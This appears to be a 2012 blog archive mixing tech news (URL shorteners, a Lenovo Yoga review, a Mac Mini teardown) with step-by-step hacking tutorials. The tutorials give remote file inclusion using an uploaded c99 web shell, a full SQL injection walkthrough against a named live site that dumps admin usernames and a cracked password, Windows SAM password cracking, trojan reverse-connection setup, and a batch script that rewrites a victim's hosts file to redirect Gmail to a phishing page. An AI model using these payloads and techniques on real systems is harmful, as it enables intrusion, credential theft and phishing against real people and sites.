Monday, October 29, 2012

Shortest URL shortening service




URL shortening services allow people to remember the addresses (URLs) of websites having long characters easily and make producing them in text through memory enjoyable. The URL shortening service dates back to 2002 and till sate there had been some thousand websites launched to provide people the advantages of a URL shortener.


While twitter automatically shortens the long URLs to allow space for more relevant words to be inserted in the posts, the URL shortening services have had many downfalls in its 12 years career. Every shortened URL has an alphanumeric code that is unique for the site and directs one there. For example the URL ‘http://www.free-online-tv-shows.com’ ingg.gg generated the link ‘http://gg.gg/39r’ that is unique. However, this does not mean that ‘http://gg.gg/39r’ will lead to the above website.


All shortened URLs must be registered before they can actually be used to direct users to certain web-pages. There are certain forums that block the posting of shortened URLs, while some short URLs may fall under the category of spammers because there are people who abuse these services for spamming. Reports have is that 64 % of the URL shortening services that have been introduced have shut down. Short URLs have also been used to conduct malicious works like child pornography that have lead to their closure. Some short URLs might lie unused, or the service provider might not be able to deliver long term services, which results in ‘linkrot’ or in other words the link and the chain of its associated links break away.


The services of gg.gg are yet to be tapped to the fullest potential with their url shortener chrome plugin.

Saturday, October 27, 2012

Lenovo IdeaPad Yoga 13 hands on: Flexible laptop for flexible Windows 8











Lenovo caught the attention of a lot of folks with the introduction of the Yoga laptop for Windows 8. The Yoga is a full laptop that has a screen you can flip all the way behind the base, turning it into a touch tablet. The Yoga 13 runs full Windows 8 and not the tablet-oriented Windows RT.


See related: Windows 8 hardware: x86 tablets and hybrids


Using the Yoga is hard to describe, as it can function as a standard Windows laptop with a large touch screen. It couples a great keyboard and trackpad with the Windows 8 touch screen elements to yield a unique user experience.






I spent the first few hours with the Yoga strictly in laptop mode. I wanted to get a feel for how well it worked as a laptop, as I suspect most buyers will end up using it this way. As a laptop the Yoga is a typical Lenovo offering, good build quality and excellent hardware components.


Hardware specifications as reviewed:
Processor: Intel Core i5 1.7 GHz
Memory: 4 GB
Display: 13-inch IPS, 1600 x 900, 10-point multitouch
OS: Windows 8
Storage: 128 GB SSD
Camera: 1 MP webcam
Ports: 1-USB 3.0, 1-USB 2.0, audio combo, HDMI, 1-in-1 SD/MMC card reader
Connectivity: Wi-Fi b/g/n, Bluetooth
Battery: 8 hours
Dimensions: 333.4 x 224.8 x 16.9 mm (13.1 x 8.9 x 0.67")
Weight: 1.5 kg (3.3 lb)


Yoga 13 as a laptop


The Yoga 13 is an outstanding Ultrabook with the attention to detail Lenovo is famous for. The keyboard and large buttonless trackpad are quite good and coupled with the bright, vivid screen turn the Yoga into a great laptop.


The build quality of the device is quite good. It feels very solid yet very light. The special hinge on the display is very durable and allows flipping the lid all the way behind the keyboard base for use as a tablet. The keyboard is turned off when used as a tablet, a good thing as you actually push keys when holding the tablet.


Lenovo is quoting 8 hours of battery life and this feels accurate based on my limited use. The power cord has the special Lenovo connector used on recent laptops, roughly the size of a USB connector.


I am having some trouble with the trackpad, that otherwise is very sensitive and works mostly as expected. It took some deep digging to find the two-finger scrolling option for the trackpad, but once I enabled it I was a happy camper. I do find that in Windows 8 the individual apps must support such scrolling.


The trackpad is also prone to accidental activation when my hands are typing. There isn't an easy way to turn the trackpad off when typing which would make things much easier.


Yoga as tablet






To take advantage of the dual nature of Windows 8, the Yoga 13 can be turned into a full tablet. The screen is flipped all the way back behind the keyboard which deactivates the keyboard. It is disconcerting to constantly mash the keys when gripping the Yoga as a tablet, and I can't help feeling it will eventually break the keys.


As a tablet the Yoga 13 is not quite as good as it is a laptop. This is due to the sheer size of the device, which is too heavy for use in the hands for very long. It is a good touch tablet, just really big with that 13-inch screen.


The resolution of 1600 x 900 makes it really narrow in portrait mode, so I end up using it mostly in landscape. This makes it a pretty unwieldy tablet.


I also find that the edge swipe gestures used to invoke the Windows 8 charms, activate app settings, and switch among running apps are hard to perform. They rarely work with the first swipe, requiring a second attempt to execute the desired action. It is also common to accidentally execute an action on whatever tile is near the edge of the screen when trying to do a swipe gesture. This results in lots of apps running I don't want.


Yoga as hybrid






The ability to flip the display all the way behind the base adds the benefit of also moving the display anywhere in between closed and full tablet mode. This hybrid mode is touted by Lenovo as allowing propping up the unit like a tent for watching video or using in presentation mode. The Yoga 13 works well in either mode, although it's not likely to be used often in such modes.


The schizophrenic nature of the Yoga 13 goes hand in hand with the schizo nature of Windows 8. As a full version of Windows 8, legacy apps can be installed and run as desired. This is a powerful augmentation of the standard Metro desktop.


I find the new style Metro apps to be quite good, and the Yoga 13 runs them well on the large display. It is possible to also snap two apps side-by-side in Windows 8, a feature the wide display of the Yoga performs to advantage. I try to keep in Metro mode all the time, but Windows 8 makes this hard to do.


You never know when you tap a tile in Windows 8 if it is going to run in the preferred Metro mode or if you're going to get kicked into the desktop mode. It is jarring when that happens, as the windowed environment on such a high-resolution screen results in constant windows adjustment and font size increasing. Everything on the desktop is just so darn small on this great screen. It's like going from a modern operating environment (Metro) to an old-school Windows 7 desktop randomly.


Conclusion


The Yoga 13 is available now from Lenovo starting at $999. It is a great laptop with a unique bending screen that can be used in a number of positions for different functions. It's a large touch tablet that can be used much the same as any tablet, yet one that runs all Windows apps.


This laptop is primarily for those who need a laptop most of the time, with light duty as a tablet. The touchscreen works well in the laptop mode due to the Metro interface in Windows 8.

New Apple Mac Mini desktop computer is easy to repair, upgrade, says iFixit














Apple haters love to point to iFixit's teardowns of its recent products as a sign of the company's consumer unfriendliness. For instance, the site just failed the new MacBook Pro 13-inch with Retina Display on its repairability, scoring it a mere 2 out of 10. Conspiracy theories abound that Apple makes it difficult to repair and upgrade its products in order to make consumers buy new models instead of trying to fix their existing ones.


They'll have to hold their tongues about the new Mac Mini, however. According to iFixit's teardown of the tiny computer, Apple has actually made a device that is surprisingly easy to repair and upgrade. In fact, it gives the Mac Mini circa 2012 an 8 out of 10 on its repairability scale.


How did that happen? For starters, Apple makes it simple to open up the Mac Mini: just twist off the disc-shaped back panel to access its components. It also makes it easy to upgrade the system's RAM, as it uses PC3-12800 DDR3 RAM; in comparison, the new MacBook Pro has its RAM soldered to the logic board, meaning there's no option to replace or upgrade.


iFixit also gives Apple props for an easily repairable power supply, and it was successful in installing its own $69.95 Mac Mini Dual Hard Drive Kit without hiccups. The new Mac Mini lacks some of the other bugaboos that have made other recent Apple products difficult to upgrade and repair, like proprietary screws and numerous parts that are glued together.


Not everything is perfect, however. One part that is soldered on is the CPU, so you can't really replace it with a new processor in the future. And even if it's not hard to replace the power supply, you have to excavate it from a mountain of parts first. Still, I have a feeling the Mac Mini will easily top the score for the new iMac, whenever iFixit gets around to tearing that down.

Thursday, October 18, 2012

Remote File Inclusion (RFI) | Website Hacking


Before starting this tutorial, I would like to tell you about a piece of code called as  shell. There are many shells available . Lets consider a shell known as c99 shell. First download it from here.
Now signup for a account on any free web hosting site . Say 110mb.com.  Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of  shell you uploaded.

http://username.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.

Both images are showing the filemanager, In Ist I am accesing by signing into my account and 2nd just by accessing shell without logging into.
                                 




I just wanted to show you that Imagine if anybody somehow upload  this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.




Note:Your account might be suspended after uploading such shells.


What is Remote File Inclusion ?

As clear from the name, Remote File inclusion means 'including a remote file' . RFI is a vulneribility found in websites that allow attackers to include a remote file on the webserver. This may lead to remote code execution and complete compromise of system.

How to perform attack ?

Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step3.  Lets say you  got any site like
http://www.victim.com/index.php?page=anything

Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.

SQL Injection


What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format 
www.anything.com/something.php?something=something, example 
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.



  


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases. 

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number, 
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.



Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from  
 information_schema.tables where table_schema=database()--
 Click here
We got first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from 
information_schema.columns where table_schema=database()-- 
Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns. 


Step 6.Fetching data from columns. 
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say 
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).


Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.

Windows Logon Password - How crackers work ?


Windows Logon Password - How crackers work ?

Cracking windows logon password is not so difficult. You can get many offline password crackers  which could change/clear the existing password (like offline nt password and registry editor) or cracks the existing password (like oph crack). Just download their ISO images ,burn them,insert to CD ROM and then things are simply self explainatory. I am writing this post to make you clear that how actually these password crackers work. 


Okay when you set windows logon password, it is obviously stored in a file somewhere in windows.
The password is stored in SAM file placed in %systemroot%\system32\config  (like C:\windows\system32\config).
Now why we just dont try to open SAM and see all stored passwords. Okay lets do it, go to C:\windows\system32\config and open SAM. You must get an error that " it is in use by some another application". Actually we cant open SAM file when windows is running . Even if anyhow we manage to access the content of SAM file, we won't get the passwords in clear text but they are encrypted.

So , what is SAM file ?

SAM stands for Security Accounts Manager. SAM is database stored as registry in windows that stores windows users passwords in hashed formats( LM and NTLM). These are usually called as hashes.


What are hashes ?

Hashes are kind of encryption.  A hash function is a one way function. One way means, if plain text
is converted into hash, it can not be converted back plain text. Remember this is the most important
point that they are one way functions.

What is windows authentication procedure ?

When ever a user creates new account in windows, its password is convetred to hash and stored in SAM database.When user logins, the password is converted to hash and is compared with the stored hash in SAM database, if both the hashes match , the user is authenticated.

How to access SAM file ?

SAM file can not be moved/copied or opened when windows is running. It can be accessed only when windows is offline/not running . Got confused that how can we use the windows files when it is not running ?
Here comes the concept of Live Operating systems. A live CD is containing a bootable OS. Just insert it in CD ROM and you can use it without any installation.

How to crack Windows password ?

Okay suppose we have got access to SAM file and have password hashes. Dont you think its useless because hashes cant be coverted to plain text ? Lets see, what we can do.

We ( I mean automated tools) can actually do two things.

1. Clear/Change password :Clear the existing hash and put new hash (we know alogrithm to convert plain text to hash) in order to change/clear the password. This is  how offline nt password and registry editor work. It doesn't give you the orignal password but helps you to change/clear it.
2.Crack password Make a long list of all possible combinations of alphabets,numbers and convert them to hashes.Compare every hash with hash we obtained from SAM file and hashes could be cracked. This is exactly how OPH crack works. It has already saved hashes of many possible combinations of letters/numbers stored in tables called as rainbow tables.

Trojan Horse (Basics) - Part 1


Trojan Horse (Basics) - Part 1

Have you watched movie Troy ? okay lets leave . Have your wallpaper ever changed automatically ? Have the programs ever started without your initiation ? Have the browser opened unexpected websites automatically ? Simply have you ever felt that someone else is controlling your computer ? NO ?
Congrats, you probably haven't been a victim of trojan yet :).

A trojan horse is a remote administration tool(RAT). This is some thing extremely dangerous.  A trojan gives the full control of victim's PC to the attacker. 
 A trojan has two parts . One is client part (Control Panel) and other is server part (meant to be sent to victim).

The basic methodology of using a trojan is as follows:-

1. Attacker creates an executable file of size in kbs. This  is  server part of trojan and mostly called as server.exe

2.Attacker might hide this server.exe behind any genuine file like a song or image. Attacker gives this file to victim and victim is supposed to double click on it.

3.As victim run that server part , a port on victim's computer gets opened and attacker can control his PC sitting remotely in any part of the world through the control panel(client part). Attacker can do anything with victim's computer remotely that victim himself can do on his computer.

Note: Now I am assuming that you know a little bit about IP addresses that is lan/internal/private and wan/external/public IP.
Two different methods of working of Trojan.

1. Direct Connection : In this method, after the server part has been installed on victim's machine, the attacker enters the public IP address assigned to victim's computer for making a connection to it. But limitations of direct connection is that public IP address is most probably dynamic and gets changed everytime one disconnects and reconnects. So attacker needs to find out IP address of victim each time.Moreover the incoming connection like this is usually restricted by firewall.
The main limitation of direct connection is that you can not access the victim who is behind a router or a network beacuse victim's machine is not assigned public/external/wan IP. It is only assigned private/internal/lan IP which is useless or meaningless for computers outside that network.The wan IP belongs to his router.

It doesnt matter how attacker is connected to internet. Attacker can be connected to internet any of three means.




Victim is behind a router in this case. (havent inserted the picture of victim behind a network, imagine that )
2. Reverse Connection: In this method, attacker enters his own IP address in server part while configuring it .So when the server part is installed on victim's computer, it automatically makes connection with client part that is attacker. Also the firewall in victim's machine would not restrict to outgoing connections. Problem in this case is same that attacker's IP is also dynamic. But this can be over come easily. Attacker actually enters a domain name in server part which always points to his dynamic IP.

Reverse connection can bypass a router or a network.


You might be confused at this point. Kindly mention your queries/doubts in comments.


Note:This was just a basic theoretical guide of Trojans. Read Part 2 containing configuration and step by step use of   Trojans here.

Desktop Phishing - Step by step tutorial


Desktop Phishing - Step by step tutorial

 It is an advance form of phishing. Kindly read my previous post on normal phishing herebefore proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure